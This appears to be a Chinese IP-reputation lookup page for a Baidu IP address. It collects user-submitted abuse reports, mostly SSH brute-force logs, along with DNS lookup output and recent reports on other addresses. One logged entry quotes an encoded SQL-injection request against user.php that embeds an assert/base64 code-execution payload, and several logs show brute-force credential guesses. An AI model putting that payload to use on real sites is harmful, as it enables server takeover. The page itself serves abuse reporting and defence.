106.13.134.164

基本信息:

城市(city): unknown

省份(region): Beijing

国家(country): China

运营商(isp): Beijing Baidu Netcom Science and Technology Co. Ltd.

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): Search Engine Spider

用户上报:

点此参与IP信息讨论

类型	评论内容	时间
attackbots	Apr 6 00:47:38 vmd48417 sshd[14398]: Failed password for root from 106.13.134.164 port 50976 ssh2	2020-04-06 07:17:15
attackbots	Invalid user wenyan from 106.13.134.164 port 45748	2020-02-29 07:23:28
attack	Unauthorized connection attempt detected from IP address 106.13.134.164 to port 2220 [J]	2020-01-26 13:15:26
attack	Invalid user direction from 106.13.134.164	2020-01-21 08:37:15
attackbotsspam	Invalid user dennard from 106.13.134.164 port 55072	2020-01-04 04:39:18
attackbots	Dec 19 15:39:34 mail sshd\[25062\]: Invalid user shot from 106.13.134.164 Dec 19 15:39:34 mail sshd\[25062\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.134.164 Dec 19 15:39:36 mail sshd\[25062\]: Failed password for invalid user shot from 106.13.134.164 port 53990 ssh2 ...	2019-12-19 22:51:35
attackbots	[ssh] SSH attack	2019-12-13 19:55:00
attackbotsspam	Dec 9 10:24:21 jane sshd[1416]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.134.164 Dec 9 10:24:22 jane sshd[1416]: Failed password for invalid user admin from 106.13.134.164 port 54356 ssh2 ...	2019-12-09 17:51:36
attack	2019-11-23T20:11:40.495440abusebot-5.cloudsearch.cf sshd\[10812\]: Invalid user grung from 106.13.134.164 port 45920	2019-11-24 04:14:49
attackspam	Nov 8 04:52:09 tdfoods sshd\[2170\]: Invalid user car123 from 106.13.134.164 Nov 8 04:52:09 tdfoods sshd\[2170\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.134.164 Nov 8 04:52:11 tdfoods sshd\[2170\]: Failed password for invalid user car123 from 106.13.134.164 port 58672 ssh2 Nov 8 04:57:26 tdfoods sshd\[2563\]: Invalid user mk@123 from 106.13.134.164 Nov 8 04:57:26 tdfoods sshd\[2563\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.134.164	2019-11-08 23:09:48

相同子网IP讨论:

IP	类型	评论内容	时间
106.13.134.142	attackspam	(sshd) Failed SSH login from 106.13.134.142 (CN/China/-): 5 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_SSHD; Logs: Sep 8 10:48:46 optimus sshd[26065]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.134.142 user=root Sep 8 10:48:48 optimus sshd[26065]: Failed password for root from 106.13.134.142 port 58966 ssh2 Sep 8 10:54:08 optimus sshd[28026]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.134.142 user=root Sep 8 10:54:10 optimus sshd[28026]: Failed password for root from 106.13.134.142 port 57340 ssh2 Sep 8 10:59:37 optimus sshd[29889]: Did not receive identification string from 106.13.134.142	2020-09-09 00:13:09
106.13.134.142	attackspam	firewall-block, port(s): 7374/tcp	2020-09-08 15:44:46
106.13.134.142	attackspambots	k+ssh-bruteforce	2020-09-08 08:18:33
106.13.134.142	attackbotsspam	firewall-block, port(s): 29420/tcp	2020-09-03 03:43:07
106.13.134.142	attack	Invalid user zt from 106.13.134.142 port 38514	2020-09-02 19:21:55
106.13.134.142	attackbots	" "	2020-09-01 00:36:51
106.13.134.142	attackbots	Invalid user anon from 106.13.134.142 port 49572	2020-08-17 04:12:17
106.13.134.19	attackbots	May 19 20:50:46 vmd48417 sshd[18889]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.134.19	2020-05-20 04:03:28
106.13.134.19	attackspambots	May 8 23:00:10 vps46666688 sshd[31277]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.134.19 May 8 23:00:13 vps46666688 sshd[31277]: Failed password for invalid user anonymous from 106.13.134.19 port 41980 ssh2 ...	2020-05-10 01:38:55
106.13.134.19	attackspambots	May 1 13:38:17 ns392434 sshd[13174]: Invalid user pai from 106.13.134.19 port 34706 May 1 13:38:17 ns392434 sshd[13174]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.134.19 May 1 13:38:17 ns392434 sshd[13174]: Invalid user pai from 106.13.134.19 port 34706 May 1 13:38:19 ns392434 sshd[13174]: Failed password for invalid user pai from 106.13.134.19 port 34706 ssh2 May 1 13:45:20 ns392434 sshd[13444]: Invalid user kalista from 106.13.134.19 port 45798 May 1 13:45:20 ns392434 sshd[13444]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.134.19 May 1 13:45:20 ns392434 sshd[13444]: Invalid user kalista from 106.13.134.19 port 45798 May 1 13:45:22 ns392434 sshd[13444]: Failed password for invalid user kalista from 106.13.134.19 port 45798 ssh2 May 1 13:47:52 ns392434 sshd[13496]: Invalid user test_user from 106.13.134.19 port 43416	2020-05-02 00:47:01
106.13.134.19	attack	2020-04-21T12:55:14.597397homeassistant sshd[7451]: Invalid user admin from 106.13.134.19 port 57042 2020-04-21T12:55:14.609134homeassistant sshd[7451]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.134.19 ...	2020-04-21 23:49:49
106.13.134.248	attack	Automatic report - SSH Brute-Force Attack	2020-04-12 21:16:58
106.13.134.19	attack	SSH Brute-Force reported by Fail2Ban	2020-04-11 05:38:52
106.13.134.19	attackbots	Apr 9 23:21:42 php1 sshd\[20825\]: Invalid user deploy from 106.13.134.19 Apr 9 23:21:42 php1 sshd\[20825\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.134.19 Apr 9 23:21:44 php1 sshd\[20825\]: Failed password for invalid user deploy from 106.13.134.19 port 45516 ssh2 Apr 9 23:25:43 php1 sshd\[21241\]: Invalid user deploy from 106.13.134.19 Apr 9 23:25:43 php1 sshd\[21241\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.134.19	2020-04-10 19:34:21
106.13.134.161	attack	Mar 25 18:35:51 itv-usvr-01 sshd[14660]: Invalid user marissa from 106.13.134.161 Mar 25 18:35:51 itv-usvr-01 sshd[14660]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.134.161 Mar 25 18:35:51 itv-usvr-01 sshd[14660]: Invalid user marissa from 106.13.134.161 Mar 25 18:35:52 itv-usvr-01 sshd[14660]: Failed password for invalid user marissa from 106.13.134.161 port 43756 ssh2	2020-03-28 01:29:13

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 106.13.134.164
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 50058
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;106.13.134.164.			IN	A

;; AUTHORITY SECTION:
.			421	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019110401 1800 900 604800 86400

;; Query time: 201 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Tue Nov 05 11:29:29 CST 2019
;; MSG SIZE  rcvd: 118

HOST信息:

Host 164.134.13.106.in-addr.arpa. not found: 3(NXDOMAIN)

NSLOOKUP信息:

Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 164.134.13.106.in-addr.arpa: NXDOMAIN

最新评论:

IP	类型	评论内容	时间
222.248.241.115	attackspam	Port Scan: TCP/443	2019-11-17 18:58:57
159.203.176.82	attack	abasicmove.de 159.203.176.82 [17/Nov/2019:07:23:25 +0100] "POST /wp-login.php HTTP/1.1" 200 6364 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" abasicmove.de 159.203.176.82 [17/Nov/2019:07:23:26 +0100] "POST /wp-login.php HTTP/1.1" 200 6221 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"	2019-11-17 19:05:48
173.249.51.194	attackspam	MultiHost/MultiPort Probe, Scan, Hack -	2019-11-17 18:51:59
190.135.50.122	attack	DATE:2019-11-17 07:24:13, IP:190.135.50.122, PORT:telnet Telnet brute force auth on honeypot server (honey-neo-dc)	2019-11-17 18:38:25
89.248.162.168	attackbots	11/17/2019-11:01:40.030187 89.248.162.168 Protocol: 6 ET CINS Active Threat Intelligence Poor Reputation IP group 99	2019-11-17 18:54:20
12.244.187.30	attackspam	Nov 16 20:19:46 sachi sshd\[23690\]: Invalid user shellz123 from 12.244.187.30 Nov 16 20:19:46 sachi sshd\[23690\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=12.244.187.30 Nov 16 20:19:49 sachi sshd\[23690\]: Failed password for invalid user shellz123 from 12.244.187.30 port 57026 ssh2 Nov 16 20:23:33 sachi sshd\[23970\]: Invalid user zzidc!@\#ewq from 12.244.187.30 Nov 16 20:23:33 sachi sshd\[23970\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=12.244.187.30	2019-11-17 18:59:24
117.50.38.202	attackbots	Jul 6 13:55:07 vtv3 sshd\[15795\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.50.38.202 user=root Jul 6 13:55:09 vtv3 sshd\[15795\]: Failed password for root from 117.50.38.202 port 55480 ssh2 Jul 6 13:57:45 vtv3 sshd\[16917\]: Invalid user mani from 117.50.38.202 port 43788 Jul 6 13:57:45 vtv3 sshd\[16917\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.50.38.202 Jul 6 13:57:47 vtv3 sshd\[16917\]: Failed password for invalid user mani from 117.50.38.202 port 43788 ssh2 Jul 6 14:08:50 vtv3 sshd\[22343\]: Invalid user jasper from 117.50.38.202 port 54562 Jul 6 14:08:50 vtv3 sshd\[22343\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.50.38.202 Jul 6 14:08:52 vtv3 sshd\[22343\]: Failed password for invalid user jasper from 117.50.38.202 port 54562 ssh2 Jul 6 14:11:45 vtv3 sshd\[23887\]: Invalid user atul from 117.50.38.202 port 43312 Jul 6 14:11:45 vtv3	2019-11-17 18:33:56
222.186.175.167	attackspam	Nov 17 11:26:00 icinga sshd[16089]: Failed password for root from 222.186.175.167 port 11126 ssh2 Nov 17 11:26:03 icinga sshd[16089]: Failed password for root from 222.186.175.167 port 11126 ssh2 Nov 17 11:26:07 icinga sshd[16089]: Failed password for root from 222.186.175.167 port 11126 ssh2 Nov 17 11:26:10 icinga sshd[16089]: Failed password for root from 222.186.175.167 port 11126 ssh2 ...	2019-11-17 18:31:37
51.255.35.58	attack	Nov 16 20:20:03 hanapaa sshd\[16496\]: Invalid user !@\#QWE123qwe from 51.255.35.58 Nov 16 20:20:03 hanapaa sshd\[16496\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.ip-51-255-35.eu Nov 16 20:20:06 hanapaa sshd\[16496\]: Failed password for invalid user !@\#QWE123qwe from 51.255.35.58 port 50614 ssh2 Nov 16 20:23:35 hanapaa sshd\[16750\]: Invalid user abcdefghijklmnopqrs from 51.255.35.58 Nov 16 20:23:35 hanapaa sshd\[16750\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.ip-51-255-35.eu	2019-11-17 18:58:43
112.114.105.144	attack	112.114.105.144 - - [17/Nov/2019:01:23:16 -0500] "GET //user.php?act=login HTTP/1.1" 301 246 "554fcae493e564ee0dc75bdf2ebf94caads\|a:2:{s:3:"num";s:280:"/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325175634768774a79776e50443977614841675a585a686243676b58314250553152625a5630704f79412f506d4669597963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/";}" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" ...	2019-11-17 18:54:39
201.249.59.205	attackbotsspam	Nov 17 11:41:52 ns381471 sshd[23977]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=201.249.59.205 Nov 17 11:41:54 ns381471 sshd[23977]: Failed password for invalid user operator from 201.249.59.205 port 38274 ssh2	2019-11-17 19:05:22
201.62.44.63	attack	Nov 17 10:30:17 vps666546 sshd\[26786\]: Invalid user yuanwd from 201.62.44.63 port 59358 Nov 17 10:30:17 vps666546 sshd\[26786\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=201.62.44.63 Nov 17 10:30:20 vps666546 sshd\[26786\]: Failed password for invalid user yuanwd from 201.62.44.63 port 59358 ssh2 Nov 17 10:35:33 vps666546 sshd\[26911\]: Invalid user daudert from 201.62.44.63 port 40190 Nov 17 10:35:33 vps666546 sshd\[26911\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=201.62.44.63 ...	2019-11-17 18:33:02
220.92.16.94	attackbots	Nov 17 08:00:07 pornomens sshd\[16121\]: Invalid user goryus from 220.92.16.94 port 51276 Nov 17 08:00:07 pornomens sshd\[16121\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=220.92.16.94 Nov 17 08:00:09 pornomens sshd\[16121\]: Failed password for invalid user goryus from 220.92.16.94 port 51276 ssh2 ...	2019-11-17 18:49:27
46.10.208.213	attackbotsspam	SSH Brute-Force attacks	2019-11-17 19:04:13
185.176.27.6	attackspam	Nov 17 11:54:11 mc1 kernel: \[5274313.362513\] \[UFW BLOCK\] IN=eth0 OUT= MAC=96:00:00:11:a9:7b:d2:74:7f:6e:37:e3:08:00 SRC=185.176.27.6 DST=159.69.205.51 LEN=40 TOS=0x00 PREC=0x00 TTL=246 ID=42353 PROTO=TCP SPT=45486 DPT=25133 WINDOW=1024 RES=0x00 SYN URGP=0 Nov 17 11:54:19 mc1 kernel: \[5274321.230198\] \[UFW BLOCK\] IN=eth0 OUT= MAC=96:00:00:11:a9:7b:d2:74:7f:6e:37:e3:08:00 SRC=185.176.27.6 DST=159.69.205.51 LEN=40 TOS=0x00 PREC=0x00 TTL=246 ID=52352 PROTO=TCP SPT=45486 DPT=40363 WINDOW=1024 RES=0x00 SYN URGP=0 Nov 17 11:54:53 mc1 kernel: \[5274355.711739\] \[UFW BLOCK\] IN=eth0 OUT= MAC=96:00:00:11:a9:7b:d2:74:7f:6e:37:e3:08:00 SRC=185.176.27.6 DST=159.69.205.51 LEN=40 TOS=0x00 PREC=0x00 TTL=246 ID=45045 PROTO=TCP SPT=45486 DPT=41467 WINDOW=1024 RES=0x00 SYN URGP=0 ...	2019-11-17 19:06:52

最近上报的IP列表

141.136.76.217	104.13.221.147	148.163.72.166	110.34.22.102
148.163.123.125	109.120.32.71	31.171.247.15	68.113.158.89
23.23.175.195	102.182.104.168	149.28.237.175	138.197.156.48
185.114.183.95	175.161.93.163	125.167.58.248	105.4.4.152
109.107.235.224	178.128.170.140	91.121.76.97	78.140.200.50